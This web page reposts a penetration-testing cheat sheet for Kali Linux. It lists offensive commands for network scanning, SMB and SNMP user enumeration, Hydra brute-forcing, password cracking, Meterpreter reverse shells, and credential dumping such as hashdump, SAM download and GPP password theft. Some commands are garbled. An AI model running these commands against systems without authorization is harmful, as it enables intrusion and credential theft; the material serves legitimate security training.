DE
DE EN
DE
DE EN
Kontakt
Anmeldung
Themen
Finanzen & Versicherung
Handel
Industrie
IT & Beratung
Tourismus
Transport
Recht
Öffentlich

Kali Linux Tutorials 2023

0
Teilen:

Kali Linux is the most advanced Penetration Testing Distribution platform.

Kali Linux is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. It is maintained and funded by Offensive Security Ltd.

Kali Linux is pre-installed with more than 600 penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners).

 

Kali Linux can run natively when installed on a computer’s hard disk, can be booted from live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits.

 

NMAP Commands

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Also Read- NMAP Commands Cheatsheet

Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Command Description

  • nmap -v -sS -A -T4 target –  Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
  • nmap -v -sS -p–A -T4 target – As above but scans all TCP ports (takes a lot longer)
  • nmap -v -sU -sS -p- -A -T4 target-  As above but scans all TCP ports and UDP scan (takes even longer)
  • nmap -v -p 445 –script=smb-check-vulns–script-args=unsafe=1 192.168.1.X- Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
  • ls /usr/share/nmap/scripts/* | grep ftp- Search nmap scripts for keywords

SMB enumeration

In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network

Command Description

  • nbtscan 192.168.1.0/24 – Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
  • enum4linux -a target-ip Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Other Host Discovery

Other methods of host discovery, that don’t use nmap

Command Description

  • netdiscover -r 192.168.1.0/24- Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site

SMB Enumeration

Enumerate Windows shares / Samba shares.

  • nbtscan 192.168.1.0/24- Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
  • enum4linux -a target-ip- Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

  • python -m SimpleHTTPServer 80 Run a basic http server, great for serving up shells etc

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

  • mount 192.168.1.1:/vol/share /mnt/nfs Mount NFS share to /mnt/nfs
  • mount -t cifs -o username=user,password=pass
    ,domain=blah //192.168.1.X/share-name /mnt/cifs Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
  • net use Z: \win-servershare password
    /user:domainjanedoe /savecred /p:no Mount a Windows share on Windows from the command line
  • apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

DNS Zone Transfers

  • nslookup -> set type=any -> ls -d blah.com Windows DNS zone transfer
  • dig axfr blah.com @ns1.blah.com Linux DNS zone transfer

DNSRecon

DNSRecon provides the ability to perform:

  1. Check all NS Records for Zone Transfers
  2. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  3. Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
  4. Check for Wildcard Resolution
  5. Brute Force subdomain and host A and AAAA records given a domain and a wordlist
  6. Perform a PTR Record lookup for a given IP Range or CIDR
  7. Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
  8. Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

HTTP / HTTPS Webserver Enumeration

  • nobody -h 192.168.1.1 Perform a nobody scan against target
  • dirbuster Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

  • tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX-

Description- Enumerate users from SMB

  • ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB /

Description- enumerate users from SMB

SNMP User Enumeration

  • snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25|cut -d” “ -f4 –

Description- Enmerate users from SNMP

  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX

Description- Enmerate users from SNMP

  • nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt(then grep)

Description- Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

  • /usr/share/wordlists        –  Linux word lists

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.

  • hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
    192.168.X.XXX ftp -V Hydra FTP brute force

Hydra POP3 Brute Force

  • hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
    192.168.X.XXX pop3 -V Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute force
Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked.

Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

  • john –wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
  • john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt JTR forced descrypt cracking with wordlist
  • john –format=descrypt hash –show JTR forced descrypt brute force cracking

Meterpreter Payloads

  • Windows reverse meterpreter payload
    set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload
  • Windows VNC Meterpreter payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

  • upload file c:\windows Meterpreter upload file to Windows target
  • download c:\windows\repair\sam /tmp Meterpreter download file from Windows target
  • download c:\windows\repair\sam /tmp Meterpreter download file from Windows target
  • execute -f c:\windowstempexploit.exe Meterpreter run .exe on target – handy for executing uploaded exploits
  • execute -f cmd -c Creates new channel with cmd shell
  • ps Meterpreter show processes
  • shell Meterpreter get shell on the target
  • getsystem Meterpreter attempts priviledge escalation the target
  • hashdump Meterpreter attempts to dump the hashes on the target
  • portfwd add –l 3389 –p 3389 –r target Meterpreter create port forward to target machine
  • portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward

Common Metasploit Modules

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac- Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

  • use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
  • use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
  • use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
  • use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL Version Scanner
  • use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

  • use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
  • post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a session
  • use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
  • use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

  • run post/windows/gather/win_privs Metasploit show privileges of current user
  • use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
  • load mimicker -> wdigest Metasplit load Mimicker
  • run post/windows/gather/local_admin_search_enum Identify other machines that the supplied domain user has administrative access to

Amap

The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.

It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.

 

(c) hackersonlineclub

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

lade-bild
London, GB
3:28 am, Juli 14, 2025
Wetter-Symbol 19°C
L: 18° | H: 20°
overcast clouds
Luftfeuchtigkeit: 75 %
Druck: 1011 mb
Wind: 8 mph ESE
Windböe: 0 mph
UV-Index: 0
Niederschlag: 0 mm
Wolken: 100%
Regen Chance: 0%
Sichtbarkeit: 10 km
Sonnenaufgang: 4:59 am
Sonnenuntergang: 9:12 pm
TäglichStündlich
Tägliche VorhersageStündliche Vorhersage
Today 10:00 pm
Wetter-Symbol
18° | 20°°C 0 mm 0% 18 mph 76 % 1015 mb 0 mm/h
Tomorrow 10:00 pm
Wetter-Symbol
15° | 20°°C 1 mm 100% 15 mph 78 % 1016 mb 0 mm/h
Mi. Juli 16 10:00 pm
Wetter-Symbol
14° | 27°°C 0.2 mm 20% 14 mph 73 % 1017 mb 0 mm/h
Do. Juli 17 10:00 pm
Wetter-Symbol
18° | 26°°C 1 mm 100% 8 mph 80 % 1017 mb 0 mm/h
Fr. Juli 18 10:00 pm
Wetter-Symbol
19° | 30°°C 0 mm 0% 12 mph 79 % 1015 mb 0 mm/h
Today 4:00 am
Wetter-Symbol
18° | 19°°C 0 mm 0% 7 mph 75 % 1011 mb 0 mm/h
Today 7:00 am
Wetter-Symbol
17° | 19°°C 0 mm 0% 9 mph 76 % 1011 mb 0 mm/h
Today 10:00 am
Wetter-Symbol
20° | 20°°C 0 mm 0% 11 mph 59 % 1012 mb 0 mm/h
Today 1:00 pm
Wetter-Symbol
23° | 23°°C 0 mm 0% 15 mph 39 % 1013 mb 0 mm/h
Today 4:00 pm
Wetter-Symbol
25° | 25°°C 0 mm 0% 18 mph 28 % 1013 mb 0 mm/h
Today 7:00 pm
Wetter-Symbol
22° | 22°°C 0 mm 0% 15 mph 30 % 1013 mb 0 mm/h
Today 10:00 pm
Wetter-Symbol
19° | 19°°C 0 mm 0% 9 mph 45 % 1015 mb 0 mm/h
Tomorrow 1:00 am
Wetter-Symbol
16° | 16°°C 0 mm 0% 8 mph 61 % 1016 mb 0 mm/h
Wetter von OpenWeatherMap
Name Preis24H (%)
Bitcoin(BTC)
€102,040.77
1.52%
Ethereum(ETH)
€2,553.91
1.38%
XRP(XRP)
€2.45
4.06%
Fesseln(USDT)
€0.86
0.00%
Solana(SOL)
€139.58
1.24%
USDC(USDC)
€0.86
0.00%
Dogecoin(DOGE)
€0.171480
1.68%
Shiba Inu(SHIB)
€0.000011
2.16%
Pepe(PEPE)
€0.000010
0.93%
Peanut das Eichhörnchen(PNUT)
€0.244556
5.81%
Risikomonitor
Erkennen und überwachen Sie IT-Schwachstellen mit nur einem Klick, bevor es zu spät ist.

Verbindung zum Dienstprogramm

Nützlicher Link

Newsletter

Folgen Sie uns

Facebook Twitter Youtube Linkedin

© 2025 risikomonitor.com gmbh

Nach oben scrollen